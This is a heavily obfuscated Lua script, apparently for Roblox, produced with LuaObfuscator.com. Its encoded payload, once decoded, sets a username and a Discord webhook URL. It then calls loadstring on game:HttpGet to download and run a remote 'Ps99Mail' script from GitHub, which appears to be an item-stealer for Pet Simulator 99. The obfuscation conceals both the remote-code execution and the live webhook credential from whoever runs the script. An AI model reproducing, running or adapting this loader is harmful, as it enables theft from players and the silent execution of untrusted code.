--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-1)))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + ((1497 -(282 + 595)) -((2192 -(1523 + 114)) + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;else local v72=(570 -(367 + 201))^(v32-1) ;return (((v31%(v72 + v72))>=v72) and (928 -(214 + 641 + 72))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1065 -(68 + 997))) then v35,v36,v37,v38=v1(v16,v19,v19 + (1273 -(226 + 1044)) );v19=v19 + ((39 -22) -13) ;v34=118 -(32 + 85) ;end if ((1 + 0)==v34) then return (v38 * (3720433 + 13056783)) + (v37 * (66493 -((1648 -756) + 65))) + (v36 * 256) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=3) then else v46=nil;while true do local v77=0;while true do if (1==v77) then if (v40==0) then local v104=0 + 0 ;while true do if (0==v104) then v41={};v42={};v104=439 -(262 + 176) ;end if (v104~=1) then else v43={};v44={v41,v42,nil,v43};v104=4 -2 ;end if (v104~=(1208 -(696 + 510))) then else v40=1;break;end end end break;end if (v77~=(0 -0)) then else if (v40~=(1263 -(1091 + 171))) then else local v105=0;local v106;while true do if (v105==0) then v106=0 + 0 ;while true do if (v106~=(0 -0)) then else local v128=0 -0 ;while true do if (v128~=(374 -(123 + 251))) then else v45=v24();v46={};v128=1;end if (v128==(4 -3)) then v106=1;break;end end end if (v106==(699 -(208 + 490))) then local v129=0 + 0 ;while true do if (v129~=(0 + 0)) then else for v168=837 -(660 + 176) ,v45 do local v169=0 + 0 ;local v170;local v171;while true do if (v169==1) then if (v170==(203 -(14 + 188))) then v171=v22()~=0 ;elseif (v170==2) then v171=v25();elseif (v170==3) then v171=v26();end v46[v168]=v171;break;end if (v169~=(675 -(534 + 141))) then else local v176=0 + 0 ;local v177;while true do if (v176==(0 + 0)) then v177=0 + 0 ;while true do if (v177==(0 -0)) then local v182=0 -0 ;while true do if (v182==1) then v177=1;break;end if (v182==0) then v170=v22();v171=nil;v182=2 -1 ;end end end if (v177~=(1 + 0)) then else v169=1 + 0 ;break;end end break;end end end end end v44[3]=v22();v129=1;end if (v129==(397 -(115 + 281))) then v106=2;break;end end end if (v106~=(4 -2)) then else v40=2 + 0 ;break;end end break;end end end if (v40==2) then local v107=0;while true do if (v107==0) then for v108=2 -1 ,v24() do local v109=0;local v110;while true do if ((0 -0)~=v109) then else v110=v22();if (v21(v110,868 -(550 + 317) ,1 -0 )==(0 -0)) then local v160=0 -0 ;local v161;local v162;local v163;local v164;local v165;local v166;while true do if (v160==1) then v163=nil;v164=nil;v160=2;end if (v160~=0) then else v161=285 -(134 + 151) ;v162=nil;v160=1666 -(970 + 695) ;end if (2==v160) then v165=nil;v166=nil;v160=3;end if (v160==(5 -2)) then while true do if (v161==2) then v166=nil;while true do if (v162~=(1991 -(582 + 1408))) then else local v180=0;while true do if (v180~=(3 -2)) then else v162=2 -0 ;break;end if (v180~=0) then else v165=nil;v166=nil;v180=1;end end end if (0~=v162) then else local v181=0 -0 ;while true do if (v181~=1) then else v162=1825 -(1195 + 629) ;break;end if (v181~=(0 -0)) then else v163=241 -(187 + 54) ;v164=nil;v181=1;end end end if (v162~=(782 -(162 + 618))) then else while true do if (v163~=0) then else local v183=0;local v184;while true do if (v183~=(0 + 0)) then else v184=0 + 0 ;while true do if (v184~=0) then else local v192=0 -0 ;local v193;while true do if (v192~=(0 -0)) then else v193=0 + 0 ;while true do if ((1637 -(1373 + 263))~=v193) then else v184=1;break;end if (v193~=(1000 -(451 + 549))) then else local v200=0;while true do if (v200==1) then v193=1 + 0 ;break;end if (v200==0) then v164=v21(v110,2,3);v165=v21(v110,4,9 -3 );v200=1;end end end end break;end end end if (v184==1) then v163=1 -0 ;break;end end break;end end end if (v163==2) then local v185=1384 -(746 + 638) ;local v186;while true do if (v185~=0) then else v186=0 + 0 ;while true do if (v186==(1 -0)) then v163=3;break;end if (v186~=(341 -(218 + 123))) then else local v194=0;local v195;while true do if ((1581 -(1535 + 46))~=v194) then else v195=0;while true do if (v195==1) then v186=1 + 0 ;break;end if (v195~=(0 + 0)) then else if (v21(v165,561 -(306 + 254) ,1 + 0 )~=1) then else v166[3 -1 ]=v46[v166[2]];end if (v21(v165,2,2)~=1) then else v166[3]=v46[v166[1470 -(899 + 568) ]];end v195=1;end end break;end end end end break;end end end if (v163==1) then local v187=0 + 0 ;while true do if (v187==(0 -0)) then local v191=603 -(268 + 335) ;while true do if (v191==(290 -(60 + 230))) then v166={v23(),v23(),nil,nil};if (v164==(1456 -(282 + 1174))) then local v196=811 -(569 + 242) ;local v197;local v198;while true do if (v196~=(2 -1)) then else while true do if (v197~=(0 + 0)) then else v198=0;while true do if (v198~=(1024 -(706 + 318))) then else v166[1254 -(721 + 530) ]=v23();v166[1275 -(945 + 326) ]=v23();break;end end break;end end break;end if (v196~=(0 -0)) then else v197=0 + 0 ;v198=nil;v196=1;end end elseif (v164==(701 -(271 + 429))) then v166[3 + 0 ]=v24();elseif (v164==2) then v166[3]=v24() -(2^(1516 -(1408 + 92))) ;elseif (v164==3) then local v206=1086 -(461 + 625) ;local v207;while true do if (v206==0) then v207=1288 -(993 + 295) ;while true do if (v207==(0 + 0)) then v166[3]=v24() -((1173 -(418 + 753))^16) ;v166[2 + 2 ]=v23();break;end end break;end end end v191=1 + 0 ;end if (v191~=(1 + 0)) then else v187=1;break;end end end if (v187==(1 + 0)) then v163=2;break;end end end if (v163==(532 -(406 + 123))) then if (v21(v165,3,1772 -(1749 + 20) )~=(1 + 0)) then else v166[4]=v46[v166[4]];end v41[v108]=v166;break;end end break;end end break;end if (v161~=(1323 -(1249 + 73))) then else local v178=0;while true do if (v178==1) then v161=2;break;end if ((0 + 0)==v178) then v164=nil;v165=nil;v178=1146 -(466 + 679) ;end end end if (v161==0) then local v179=0;while true do if (v179==(0 -0)) then v162=0 -0 ;v163=nil;v179=1;end if (1==v179) then v161=1;break;end end end end break;end end end break;end end end for v111=1,v24() do v42[v111-(1901 -(106 + 1794)) ]=v29();end v107=1 + 0 ;end if (v107~=(1 + 0)) then else return v44;end end end v77=1;end end end break;end if (v39==0) then v40=0;v41=nil;v39=2 -1 ;end if (v39==2) then v44=nil;v45=nil;v39=7 -4 ;end if (v39==1) then v42=nil;v43=nil;v39=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=114 -(4 + 110) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==2) then v52=v21(v49,21,615 -(57 + 527) );v53=((v21(v49,1459 -(41 + 1386) )==1) and  -1) or ((61 + 43) -(17 + 86)) ;v47=3 + 0 ;end if (v47==(0 -0)) then v48=v24();v49=v24();v47=2 -1 ;end if ((169 -(122 + 44))==v47) then if (v52==(0 -0)) then if (v51==(0 -0)) then return v53 * (0 + 0) ;else local v99=0 + 0 ;while true do if (v99==0) then v52=(1 + 0) -(850 -(20 + 830)) ;v50=65 -(30 + 35) ;break;end end end elseif (v52==2047) then return ((v51==(0 + 0 + 0)) and (v53 * ((1258 -(1043 + 214))/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(2235 -(323 + (1015 -(116 + 10)))) ) * (v50 + (v51/(2^(139 -87)))) ;end if (v47==(581 -(361 + 219))) then v50=1 + 0 ;v51=(v21(v49,321 -((791 -(542 + 196)) + 267) ,(10 -5) + 15 ) * ((415 -(15 + 398))^(1014 -(18 + 282 + 682)))) + v48 ;v47=7 -5 ;end end end v26=nil;function v26(v54)local v55=0 -0 ;local v56;local v57;while true do if (v55==(2 + 0)) then v57={};for v78=1 + 0 + 0 , #v56 do v57[v78]=v2(v1(v3(v56,v78,v78)));end v55=13 -10 ;end if (v55==(0 + 0)) then v56=nil;if  not v54 then local v95=0 -0 ;while true do if (v95==(0 -0)) then v54=v24();if (v54==(1551 -(1126 + 425))) then return "";end break;end end end v55=(2 -1) -0 ;end if (v55==(406 -(118 + 287))) then v56=v3(v16,v19,(v19 + v54) -(3 -2) );v19=v19 + v54 ;v55=1123 -(118 + 1003) ;end if (v55==(2 + 1)) then return v6(v57);end end end v18=5;end if (v18==2) then function v22()local v58=0 -0 ;local v59;while true do if (v58==(0 -0)) then v59=v1(v16,v19,v19);v19=v19 + 1 ;v58=1 + 0 ;end if (v58==((757 -(239 + 514)) -3)) then return v59;end end end v23=nil;function v23()local v60=0 + 0 ;local v61;local v62;while true do if ((1329 -(797 + 532))==v60) then v61,v62=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 ;v60=1 + 0 ;end if (v60==(2 -1)) then return (v62 * (1458 -(373 + (1560 -(476 + 255))))) + v61 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then v20=v0(v3(v63,1,1));return "";else local v73=v2(v0(v63,16));if v20 then local v80=v5(v73,v20);v20=nil;return v80;else return v73;end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=0;local v68;local v69;local v70;while true do if (v67==1) then v70=v64[3];return function(...)local v81=v68;local v82=v69;local v83=v70;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94>0) then local v113=v93[2];local v114=v91[v93[3]];v91[v113 + 1 ]=v114;v91[v113]=v114[v93[4]];else v85=v93[3];end elseif (v94<=2) then local v119=v93[2];v91[v119]=v91[v119](v13(v91,v119 + 1 ,v86));elseif (v94==3) then local v130=v93[2];local v131,v132=v84(v91[v130](v13(v91,v130 + 1 ,v93[3])));v86=(v132 + v130) -1 ;local v133=0;for v152=v130,v86 do v133=v133 + 1 ;v91[v152]=v131[v133];end elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v66;else v91[v93[2]]=v66[v93[3]];end elseif (v94<=6) then if (v94==5) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]();end elseif (v94<=7) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v66;else v91[v93[2]]=v66[v93[3]];end elseif (v94>8) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else local v138=0;local v139;local v140;local v141;local v142;while true do if (v138==0) then v139=v93[2];v140,v141=v84(v91[v139](v13(v91,v139 + 1 ,v93[3])));v138=1;end if (v138==2) then for v172=v139,v86 do v142=v142 + 1 ;v91[v172]=v140[v142];end break;end if (v138==1) then v86=(v141 + v139) -1 ;v142=0;v138=2;end end end elseif (v94<=14) then if (v94<=11) then if (v94==10) then do return;end else v91[v93[2]]();end elseif (v94<=12) then v66[v93[3]]=v91[v93[2]];elseif (v94>13) then local v143=v93[2];local v144=v91[v93[3]];v91[v143 + 1 ]=v144;v91[v143]=v144[v93[4]];else v66[v93[3]]=v91[v93[2]];end elseif (v94<=16) then if (v94==15) then v85=v93[3];else v91[v93[2]]=v93[3];end elseif (v94<=17) then local v126=v93[2];v91[v126]=v91[v126](v13(v91,v126 + 1 ,v86));elseif (v94==18) then do return;end else v91[v93[2]]=v93[3];end v85=v85 + 1 ;end end;end if (0==v67) then v68=v64[1];v69=v64[2];v67=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A726578735363726970742F50732O394D61696C2F6D61696E2F50732O392E6C756103083O00557365726E616D6503083O006269676A2O31303403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132313036383433352O3133303337343234352F6465692D467A39636636314E3543694A667A305235683647714539515F35516153664569436A2O5764783753384D76305F6672555657722D374F4E504A72506148714B5400143O0012133O00013O0026093O000B0001000200040F3O000B0001001204000100033O001204000200043O00200E000200020005001213000400064O0008000200044O000200013O00022O000600010001000100040F3O001300010026093O00010001000100040F3O00010001001213000100083O00120D000100073O0012130001000A3O00120D000100093O0012133O00023O00040F3O000100012O000A3O00017O00",v9(),...);
